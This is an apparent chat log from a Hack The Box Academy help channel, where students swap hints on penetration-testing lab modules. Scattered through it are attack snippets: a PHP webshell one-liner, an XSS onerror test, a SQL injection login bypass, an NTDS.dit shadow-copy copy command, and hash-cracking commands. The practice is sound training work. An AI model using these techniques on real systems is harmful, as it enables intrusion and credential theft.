im going crazy on the password attacks module section mutations the its so slow and its impossible to go through 90k wordlist
Copy the wordlist, and remove the first 17k lines.
keep trying until you get question with very simple answers and then focus only on trying answer to this question
Just got it! thanks! Leigb!
thanks man saved me a lot of time
Someone to help me? ^^
I think you need onerror there instead of onload. It tries to load the image listed at src and then if it can't it triggers the onerror. Something like ||' onerror=alert("oops")>||.
Bud are you here?:) I want ask again about Broken authentication skill assessment.
So, now I have ||support.uk:support|||| md5+b64|| cookie. I made a wordlist with ||support.uk(md5)||:roles from ||/CommonAdminBase64.tx|||| md5 encrypted|| ; set up my intruder for ||base64 encode and url main chars||
BUT no one role doesn't fit, what's the problem?
Guys mb you know what to do with that skill assessment?
The only thing I have to do is enumerate role but no one role doesn't fit.
This module drives me to despair...
Hey I just signed up and i was clicking on linux fundamentals module
But I can’t unlock it for some reason
you dont really need a wordlist. Just think of what role you are trying to achieve
Like when i click unlock nothing happens and the page is zoomed out a little bit
you got 1 single character wrong 🤣
try contacting support
From where
hint the ||color question|| also i don't know if burp will work for this or not but i'm pretty sure it won't
chat bubble
A gf q a
Thanks MrTom! I had this one!
Im using brave browser, cant really click any buttons
Let me disabled
The thing
Adblocker
Wait
It works now
shiet...😡
I hate this module
but thank you. 1 character i think it is capital S in support...
wait no i mean the code 🤣
I got it so fast I remember... But yeah
fast??
yeah i think you are the first
in some the section if you are doing this when the module first come out and no one where the cred will be in the wordlist it's going to take a good bit to crack
and if you are doing something wrong you will just don't know
yeah true. I spent on Broken authentication more than a week... which is insane...
which assessment? and how tf did you get a powershell remote shell ?
im stuck on lsass because i cant get pypykatz running
AD skills part I, I have done on MS** a reverse shell on the first windows but when I have connection, I can’t do nothing
if you are on the pwnbox i got no idea how to get that tool to work
wait
ATTACKING WEB APPLICATIONS WITH FFUF, Sub-domain Fuzzing
should I see the subdomain in here, with the command I used?
I think that broken authentication module needs in some improvements...
if you are having issue with the tool on the pwnbox check this
#modules message
your command looks about right
a rev shell as which user?
On MS** (sql_***) to web-win01
you can just F ing rdp in 🤣
I can rdp on web-win?
i didn't so no idea
Hii
Hum So i need to use web-win to pivot and after I should rdp with kali
Your command is correct.. what are you looking for?
i try to answer this one: HackTheBox has an online Swag Shop. Try running a sub-domain fuzzing test on 'hackthebox.eu' to find it. What is the full domain of it?
should i see it?
wait let me run a quick scan on hackthebox domain
i remember the answer and its pretty easy one
but let me check if if get it in the scan results or not
Omg it works thank you
hey @robust mulch can you send me a DM when you have a moment?
can i dm you?
ya sure
no idea why but i run that exact command on the pwnbox and it found the right subdomain 🤣
Yes that does it! ty sir
Try HTTPS instead of HTTP.
I have tried so many variants and admin and support etc... all of these variants.
Now I have no Idea what to do:)
solved it. thank you 🙂 i found the answer yesterday...but must had a space at the end it was counted as wrong...
bro 🙂 since i knew the answer I straight up searched for it in browser and got redirected to a different site hackthebox.**** so I thought I won't show up in FFUF but it did..
well thanks for helping
can someone help me connect via rdp to server for the wireshark module?
the instruction tell me We will be sniffing traffic from the host we logged into from our own VM or Pwnbox. Utilizing interface ENS224 in Wireshark
i dont have that interface. i thought the VPN was one of the tunnels (tun1 or tun0)
xfreerdp /v:TARGETIP /u:USERNAME /p:PASSWORD
ok so i am using remmina i don't have xfreerdp installed
i am connected already to that machine but i still dont see this EN224 interface in wireshark when i run it on my local box
the remmina interface has displayed a desktop that is "weird"
the first time i tried to connect it asked me for Mr beans password to allow 'color'
You need to run Wireshark on the host you connected to.
so i reset the link and now i get a all black screen with no controlls that i can see
right click does not bring up a menu to get a terminal
Log in with RDP (Remmina) on the specified host.
Then start Wireshark there.
ok so i figured out how to start wireshark by clicking on 'activities' but the resolution is only 644x480 so i cant use wireshark
how do i fix the resolution on the rdp hosted computer
maybe this will help you
none of those suggestions fixed the problem. i am using a parrot os (HTB edition). i am unable to install xfreerdp2-x11 due to package version backward compatibility issues (according to apt-get with the freerdp-client package) and remmina is not allowing me to dynamically change the resolution or manually set it before i connect. any other ideas?
I'm stuck at the Broken Authentication Assessment (https://academy.hackthebox.com/module/80/section/848). I registered an account and looked at the session cookie. I put it in cyberchef and out comes a MD5 hash which returns the username of the current logged in user. Then I just have to find the right user right? I did this by brute forcing the username in the message sending site ("User not found" ...), out comes the user "guest" is available. But when I make the MD5 hash of guest and put it to base64 it just won't accept the cookie and won't work. Then I tried to brute force the password using rockyou.txt and filtered the right passwords out, but no success. Please help me 
With this you should be able to install xfreerdp on Parrot OS
sudo apt-get install aptitude
sudo aptitude install freerdp2-x11
https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/
Take a good look at the site. It contains a hint how the user you are looking for must look like.
ohhhhhhhhhh
and i have to brute force the password for the user "support" right?
No, look at the hint again carefully.
Send me a DM if you need help. I do not want to spoil here.
hey guys! I'm beginner here in the field of cybersecurity. It's my dream to become an ethical hacker and join the cybersecurity and i've join this server to learn all the stuffs about cybersecurity and ethical hacking from the basic. Right now, I'm searching for someone who is experienced ethical hacker and can teach me or guide me towards ethical hacking from the first step. Is anybody there to help me?
nope but if you are new give both of these video a check https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4
I need help with the IPMI section of the footprinting module. I have to get a password in cleartext. I got the hash but I can't seem to brute force the password with hashcat, crackstation, or metasploit's default list. not too sure where I'm going wrong
|| msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set OUTPUT_JOHN_FILE john.txt ||
Then you should be able to crack the hash with John.
still having trouble with this wire shark lesson i am in the proper computer and on wire shark now.. but i only ever see a file called flag.jpeg which is not the correct file the hint suggest i should see other incorrect files like water.jpg htb.jpg that i never see. the picture i get back is that of a dog and seems to have nothing to do with transformers (for which i assume is a reference to the child's cartoon and not a electric grid component ) either. am i just failing to understand the program?
Yeah I def recommend John for this one, as the hashcat output isn't usable by hashcat
Ty!
it works for me the cookie you wrote but there's no admin panel in the ||"support.uk"|| account
no admin panel for the ||support|| account either
hint because that user isn't an admin user
thank you then I go back to username fuzzing
hello guys, I am doing File Upload Attacks: Whitelist Filters, and there are two techniques to use, I have used both of the techniques, and generated the successful payloads through Burp:Intruder, and after sending and testing all the payloads through Burp:Repeater, I get "File successfully uploaded", but after opening/examining any shell through browser or curl, I get 404 not found error.
but I noticed in all the the payloads there is "/" or "" as a special character, so I URL encoded them, and try to open them, but still 404 error appears, any help will be appreciated
the other special character is back slash
I am having the same issue, I haven't found any reference to "A certain Transformer Leader" and just found a flag.jpeg file with a dog.
i tried to let it run longer and filter way less
still only get the dog but i was able to use the traffic to answer the other question about the user name so i know i am not doing everything wrong.
same, I got the username as well - it seems broken to me
some things can be apparently good uploads but converts into bad filenames that either the file system or the web server cant path to properly.
so you get a good upload result, but youll never reach those files. Just gotta skip em as false positives
it is not the first time i tried to reset it. i think i might revisit it in a few days when i have time to get back to this ... hope you get it working or they fix it (or both).
I am going to move on as well. I will DM you if it works for me.
I mean I only got 6 or 7 positives out of like 200, but what do you suggest to do, what different things could be done ?
modules are rarely rarely actually broken. But I dont think Ive done the one yall talking bout so idk.
awesome best of luck i will do the same if i get it working next week
probably need to expand the range of extensions youre trying
i assume i am filtering it out somehow
but because i can get the user name and see the dog... i am not so sure.
okay, I will try
i do not think i am filtering anything out at this point in time and still only see the flag.jpeg file that contains the dog.
how do i make firefox not change a \ to a / in the url
does %5C work?
i think that is that code like %20 for space but for the backslash
gotcha, ill figure it out, thank you
is anyone else getting traceback errors when running pypykatz.py? redownloading it and ran the install but no matter which module im trying to run it gives this error
Traceback (most recent call last):
File "/home/h0gbyte/Tools/pypykatz/pypykatz/pypykatz.py", line 12, in <module>
from pypykatz.commons.common import KatzSystemInfo
File "/home/h0gbyte/Tools/pypykatz/pypykatz/pypykatz.py", line 12, in <module>
from pypykatz.commons.common import KatzSystemInfo
ModuleNotFoundError: No module named 'pypykatz.commons'; 'pypykatz' is not a package
or better question. would anyone know if it would hurt the file if i removed this line
nvm commenting the line out doesnt change anything
has anyone found a way around this. i reinstalled again from github and its showing different lines as the problem
How to get the 'academy user' role?
verifying with the noahbot using your academy discord token
I don't see any?
itll be under settings under your account in the academy
I am in my account.. but I don't see such token 😅 I have seen in on my HTB account tho
are you paying for the academy?
I am
aww wait, I have stopped the payment
ahhh. there you go
np. would you happen to know anything regarding my issue by chance?
Nope😅 But I do know haha ; )
alrighty np. it is weird. i cant tell if its an issue with the tool or with my machines libraries
ill just come back to that section
hmm it seems the package is not installed
Which section are you doing?
it seems that way but ive run the install. and ive run it directly from the git folder after download. same error. just different lines
That's weird.. which tool do you try to use
the lsa minidump
yes it is
its all good. i put out a community help thing maybe someone has run into the issue
Wait, I can try it for you on my Ubuntu vm
dm me the link of the tool ; )
I receive another error atm
what error are you getting?
yup i was getting that one too
Hmm sorry man, I can't solve this one in a few mins
idk how HTB tells you to install/use it
its all good. ive been trying to figure it out for a while
oh i had this earlier today
same pypykatz problem
hold on i search for the message
it doesnt say anything about installing. just talks about the tool. and the use is for an lsass dump file. so it would run as pypykatz lsa minidump <lsadumpfile> to run it
Make a new instance
pip3 install --upgrade pyopenssl==22.1.0
pip3 install pypykatz
pip3 install --upgrade minikerberos==0.3.5
if you use pwnbox
im using kali. but that still may work
it worked for me
holy shit. i think that worked
but i have to say the password attack module is kinda pain
i know i had the same reaction
it did. dude thank you so much. yea it seems minikerberos i had was 0.4.0 and pyopenssl just wasnt there
i see. damn shouldn't have upgraded kali then. although there was a certain tool in an earlier module that required postgresql 15 and i had 14. pretty much screwed myself getting those changed out. so thats why i upgraded
well then i will actually put that in the community help for anyone else having the same issue. thanks guys
I think you can install specific versions
footprinting, medium lab, i found ||alex's|| credentials, i used ||remmina|| to login to the windows machine, i found ||important.txt|| im trying to use it as the ||Administrator password|| but it doesnt work, it says "the username or password is incorrect" may i please have some help?
You are on the right track. Try this Creds for login with rdp
how didnt i think of this??? thank you so much
How do I connect to the vm to capture data with wireshark in page 5 of AD enumeration and attacks the host it gives me to rdp into is a Linux box that can’t capture with wireshark
Working on the last question on the hashcat module in academy. The HTLM question. It always comes back as exhausted. I tried it with some of hashcat's built in rules but got the same result. what am I missing?
the command that I am running is clear
sudo hashcat -a0 -m27100 DC01.inlanefreight.local.ntds rockyou.txt
The guest account won't help you. Read all the pages and see if you can't figure out a likely account.
hint wrong mode
the hash isn't NetNTLMv2
with rockyou?
yes
i really cannot find another username i tried admin, root, administrator, alex, public, important, windows none of them work
DM
i just give it a try and after 20 sec of running hashcat with rockyou it's cracked like almost 500 password
I need some help with the Broken Authentication skills assessment.. I have the support usernames (6 total), decoded the cookie (not the persistence one, no idea about that). Can't seem to get any passwords from rockyou.txt to work.. My grep filters down to 14 possibilities and they all fail.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hello everyone, doing the attacking enterprise networks - lateral movement, and I did escalate with the ilfserveradm user to Administrator but still cannot get the flag from the admin desktop? Anyone available to get me some help with it or tell me if I am doing something wrong/missing something? Thank you
can someone give me a nudge on https://academy.hackthebox.com/module/143/section/1274 question 2 ?
what is the module and section; what exactly is giving you an issue, can you give an example of what you have tried (avoiding spoilers ofc); not everyone feels like just clicking the link to see what it's about
I love looking up the forum posts from the hackthebox academy stuff and finding @acoustic owl just in there somewhere in the thread xD
can i dm you not to spam here ?
just ask your question here unless you really can't ask the question without it being a spoiler?
yes, you can find me everywhere 🤣🤣
Ah it's this module; I haven't gotten that far yet in this module been back and forth a bit lately
oh ok :D, support is already helping, ty! 😄
i remember being addicted to HTB before the academy and seeing you everywhere xD
or am I mistaking you from somebody else xD ?
the command that I tried most recently was "sudo hashcat -a0 -m1000 <file from .zip> <rockyou.txt>" and got nothing
hmm
i don't think m1000 is the right mode to unhash that file extension
even still there's an x2john that can be used
1000 is ntlm
https://hashcat.net/wiki/doku.php?id=example_hashes @visual quail
For anyone stuck with a similar issue in Attacking Common Services - SQL Databases. My issue was resolved by || extracting the mssqlsvc user hash again, the hash I originally got wouldn't crack so I got it again and it was different and cracked instantly ||
Found my own mistake when testing the passwords. Always understand the functions you use..
I got it! turned out that my command was correct. I would start it and then walk away from the computer and come back and it would say exhausted and I would go back to the drawing board. If I would have scrolled up I would have seen all the passwords that it cracked. the rest of the question was easy after that. Thanks for the help though!
Ah yeah it was unhashing the entire thing it sounds like
Instead of just the one you needed
yep
Hey did you find a way to fix it ?
I found the ones with actual hashes then made a list off that instead :)
That would have been a more efficient way to do it for sure.
yup
Is somebody available to help me get he double pivot working to MGMT01 on Attacking Enterprise Networks module (post-exploitation section)? The handler on my host doesn't catch the DC01 payload even if everything is set up just fine... thank you!!
Hello, I am on the NFS chapter in the footprinting module. The first step is to cat /etc/exports/ The problem is that my computer does not have that file. Any thoughts on something I missed?
figured it out. needed to install nfs kernel.
@iron basin Did you get a nudge on your Login Brute-Force question? I'm stuck on the last two questions. I understand it as, since you now have an employee (cant say I do), stalk them, cupp a wordlist, brute ssh, get flag, then lateral locally to another employee and their flag. Thoughts?
@iron basin Tried -C combined, tried -P for pw list with -l for various users gained in module. Banner grab revealed a listening service so I exhausted those attempts. Tried -L and -P with many wordlists each but keep running out of time. I feel like I missed an "employee" name somewhere.
On attacking common services easy could i have some help getting my shell to work?
i am able to write files in mysql. I also see info about the xampp/xxxxx directory.
this section is making me bang my head
mood
yeah the webshell was a bitch
i don't recall exactly how I got it to work
I just remembered googling a bit then making it work with the ?c= <command>
What exactly is not working?
If you know the webroot directory and can write files there, then you can write a webshell in this directory
I can't access the webshell on the site
and I can't get a meterpreter session
I am following this blog https://outrunsec.com/tag/web-shell/
remember xampp is Windows
because that is a whole other mood xD
but are you uploading a webshell or rev shell?
because you said meterpreter
you're unable to navigate to http://website/<file>?
I have written a PHP webshell in a file
let me show some screenshots of my process. I am not good at explaining
we know :^)
|| I realize i didn't specify port 8000 in screenshot, but even if i do meterpreter session wont happen ||
yes lol
Try it with
|| "<?php echo shell_exec($_GET['cmd']);?>" ||
sweet!
how did you have the intuition to know this
If you are not sure if you are in the right place and your PHP is running, you can also write a PHP Info File
<?php phpinfo();?>
I am not quite sure.
But normally I test with php info if PHP is working. The rest I do with Google
The tools they recommend for pivoting aren't great, in my opinion. This one made my life a lot easier:
Can I get any hints for this question?
I am new and I am wondering where to start?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
anyone can help with Attacking SQL Databases .., please DM me
hey
username = a' OR '1'='1
password = a' OR '1'='1
Modules_make_pwsh_run!
Hi guys I am stuck on this question does not find the user to verify the login error. the question is as follows.
Which user account on the domain controller has many event identifier login errors (4625) generated in rapid succession, which is indicative of a password brute force attack? Flag is the name of the user account.
i don´t understand
Hi guys, noob here - want to get into pentesting, found this channel. My name is Nick, happy to be here, nice to meet you all!
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@rustic sage ^
Thx ++
Password attacks
Medium Lab
logged in as user j**** what to do now
Greetings !
I have an issue on question 1 WINDOWS PRIVILEGE ESCALATION : Further Credential Theft
find the sql01 passwd
I've used all tools available but can't find any trace of it. Can someone give me a hint ? 🙂
look for the services that are active
And what then? Pass reusage, mutations, looking for creds in some files?
You can use J**'s credentials to enter that service
and then look for information
God damnit, just had to read the question carefully ... Just login as Jordan ...
Hi all I am stuck and confused in the getting started (Web enumeration question "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag. ")
I scanned with nmap and get the login page, and scanned with gobuster and I got the wordpress is in setup mode.
The hint says "Everything you need to login is given to you"
I tried admin admin and admin password in the login page no success.
If I hit continue in the setup page nothing happen.
What am I missing?! I really need to understand here if I should be able to solve this exercise just using what has been explained in the Web enumeration page, or there is more to do.
I am not looking for a solution but I really need to understand how I need to approach to this course.
Thank you so much for any help
Sorry I solved it and it was super easy, this is confirming me that the assessment in the session is related to what has been explained to the session itself, good to know, now I can keep going more relaxed
nope, it is useful when and how to use them
footprinting, hard lab, i found the ||imap|| creds and logged on, i have no clue how to find the ||ssh key|| i selected the ||important|| folder and i need help with the commands, how do i view all messages? ||1 search all doesnt return anything an any folder except inbox, but its not the ssh key||
Attacking Enterprise Networks
i found the creds but "monitoring.inlanefreight.local" redirects back to "login.php" after authentication
doesn't go to the next page
Any tips for brute forcing Johanna's password? In the password attacks lab hard (I am using crackmapexec with winrm option)
anyone available for help on the last hop of the pivoting skill assessment (via dm)?
Active Directory assessment
I used the webshell to get an RCE but I can't find credentials to access the machine .. I tried to look for connection string or credentials on the web.config file and found nothing .. also when I try to run powerUp script I get no response. can anyone tell me what should I do or give me a hint?
have you tried using the msfconsole module? I believe that's what I did.
I hadn't planned on using msfconsole, lately I was using Hydra and then I read that it was more advisable to use crackmapexec with the winrm option. I'm going to try it thx
https://donsutherland.org/crib/imap / This is what I used, definitely worth saving/bookmarking
You don't have to it was just a suggestion. That entire module you're supposed to use the given wordlists so try those! Also don't forget about password manipulation.
So I'm working on the web proxies module in the repeater section. I got the flag, but it's saying its wrong. What I did was send the request to repeater, then ls. flag.txt popped up so i cat flag.txt & got a flag. The hint is saying its not in the same directory, but I didn't have to traverse any directories. What am I doing wrong?
Yep, im just using the list with passwords mutated
wait I now see it says OTHER flag
Password Attacks/Attacking AD: I am trying to copy this NTDS.dit file, but it keeps saying that it cannot find the filepath....am I doing something wrong here cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
Did you create the NTDS directory?
ayyye... thanks man! hahah
My burp suite has stopped forwarding requests. It is stuck on the loading page. Any suggestions?
I get : "error: failed to connect to <ip address>
Someone here who finished Attack SMB and can give me hint?
make sure u delete any space
can someone give a hint for password attack - pass the hash, I am in the last question where we need to connect to julio DC01, I send a reverse shell, it works but I dont get any session, anyone knows why? I used pwnbox and my own machine
I dont know what module this is..
did u use that as the answer ?
i did like 100x times
I even use different ports
wont work
Can anyone help please 😭
i mean name of the module ?
the S
@acoustic owl can you give me a hint for attacking smb, got stuck on the last question and can't get the id_rsa, when trying to authenticate through smb
Which module?
Attacking common services
@acoustic owl can you also give me a hint on Password attack- pass the hash last question, I cant receive a reverse shell from julio DC01
😦
This question?
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.
exactly
But you have solved the question before? Then you have the password
i know but im forced to use only pubkey authentication and got permission denied, also tried to force password authentication with -o but doesnt work
This one?
Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happen if you use evil-winrm?. Mark DONE when finish.
no the extra one
the one before
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Write me a DM with the command you used.
And what exactly is not working?
when I use nc, listening for the connection
the command executes but I can establish the connection
cant*
I been using different ports and trying different listeners provided by revshells.com
send me a DM
Have you solved your burp problem?
yes, it just started working again
Hi guys I am stuck on this question does not find the user to verify the login error. the question is as follows.
Which user account on the domain controller has many event identifier login errors (4625) generated in rapid succession, which is indicative of a password brute force attack? Flag is the name of the user account.
Help me!
Which module?
Is it normal for Get-DomainObjectACL to take ages ? ._.
How did you find the flag? I need to learn how
Hey Guys
Have a problem where i cant copy and paste commands from my local machine into the VM instance. I can do it the other way around from the VM instance to my machine but not from my machine onto the VM instance
Any ideas how to fix this as it is so annoying.
Many Thanks
Kapz
@ Introduction to Windows Command Line
I know but what's the method to find it I tried all those commands and only the windows modules are showing
I'm still stuck on performing brute force on johanna, any hint? #password attacks lab hard
@unique ridge Wait a minute and I'll tell you how because I don't remember
ok thank you
How did you get that as i am using a Windows Machine
I am not on Kali Linux
Get-WinEvent is your friend
It doesn't matter. It should be the same on Windows. Just go into the settings of the VM
I have found the login error but I don't know how to apply it to the user to whom the error is addressed
DM
HI mate how do i send you a picture to show you what i see
As this is the VM that is in the web interface
It is a Parrot box and my machine is a windows machine
So annoying i dont know how to send a picture through here
Hello Team,
Can anyone give me a good resource to learn thick client pentesting
Oh, not your own VM? You are in the PwnBox?
Then when you open it in fullscreen, it has a bubble at the bottom right.
Click on it
Ok i got it thanks. But need to now work out how to send pictures on here
Just do a printscreen
i did that but when i do drag and drop it just says move and does nothing. When i try and paste it in the chat line nothing happens. 😦
did anyone finish Password Attack Lab - Hard?
Ok this is weird on another discord channel i can upload pictures but for hack the box i dont have the option to upload pictures. How do i get the right to upload pictures? 😦
It says useapps and that is it
Does not have upload option
Seems like a permission issue to me
I tried 3 different browsers as well as my mobile and i get the same problem
Is there an admin or someone i can reach out to about this
for the Password Attack Lab - Hard, How do I move the Logins.kdbx into the local attack machine? it says permission is denied
Let me check my notes! I will be back... those labs are horrible 😦
Thank you so much 🥹🥹🥹
Anyone working in the bash scripting module?!?! I've been stuck for a while in the Flow Control-Loops section 😦 😦 😦
Or anyone with knowledge in bash scripting??
I DM you
which module is that?
Bypassing Security Filters
Stuck on the module footprinting - imap/pop3. The task is to access "the emails", but I can only find one and there's no flag in it
I havent done that yet, If it is from web attacks
that module missing some information
check google and/or discord
oh. I'll do some digging on disc then. thanks
people shared some links for IMAP commands check those
Hi, I'm going through the vulnerability assessment and have reached the "Getting Started with Nessus" section. I'm having trouble downloading Nessus onto my kali VM. I've selected the latest version of Nessus and the Linux - Debian - amd64 download. But when I try to the .deb file it fails. Any tips on getting this to work?
I had to google quite a bit, found a working example of a command on stackoverflow. the syntax is killing me lol
#bot-commands ++verify
how are you trying to do the .deb file? because there's a dpkg command that unpacks and installs debian packages
.deb is the file extension for debian based packages; it's not an installer itself
In the ICMP Tunneling with SOCKS section of the Pivoting, Tunneling, and Port Forwarding module, I get this message when trying to run ptunnel on the pivot machine:
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)
From what I understand it's because my Kali VM is more up to date than the pivot target but I can't compile it on the target either as it doesn't have autoreconf... I'd like to avoid having to compile it on my Kali VM with an older version of gcc as I'm very not pro at it
ptunnel is not working due to an update; just use a different tunneling technique I wasn't able to find a reliable source to fix that issue
but all the tunneling flags can be found regardless of which technique used :)
Yeah I saw a few of them in the last section so I was going to go that route as a last resort, but was wondering if there was a (fairly) decent way to make ptunnel work
I was unable to find a reliable way to get ptunnel-ng to work
guys I literally finished Attacking Common Applications I just left the third question on Skills Assessment II: "What is the FQDN of the third vhost? " can anyone help me?
ok thanks... tbh in a few other sections in this module there were issues/complications to make the tools work on the pivot box... I guess it's overdue for an update...
have you tried ffuf fuzzing?
one of the tools that required the most work; required you to disable the real-time-protection
This tmux question is total senseless ... WTF
yup I think that one was 2 sections ago
I have used ffuf to find the subdomain for the last question
have you tried digging ?
yes I have tried with this command: "dig ns ||monitoring.inlanefreight.htb|| @10.129.201.90"
and also dig axfr ||monitoring.inlanefreight.htb|| @10.129.225.125
is there a reason you're digging the subdomain and not the main domain?
I also tried: "dig axfr inlanefreight.htb @10.129.225.125"
but still get: ";; Connection to 10.129.225.125#53(10.129.225.125) for inlanefreight.htb failed: connection refused."
is that the spawned IP?
yes
I used the dpkg command earlier but didn't have any luck.
I can download other .deb packages fine. It seems like Nessus is the only one I'm having issues with.
Windows Fundamental is actually cool too!
Really fun learning Windows in the process.
Hello friends, can you help me with a problem?, I'm trying to hack johanna's password using mut_password but I'm not having good results, any ideas? or any hint of how johanna's password begins? this is in the Password attacks Hard lab module
Try a different list that may rock your world
Looks like I can download it fine on my hostOS. Guess I'll just run it in mac for the module and worry about it later.
IDK if i can change the list, cuz in my module it's recommended to use the password attacks resources.
Anyone in here working on escape today?
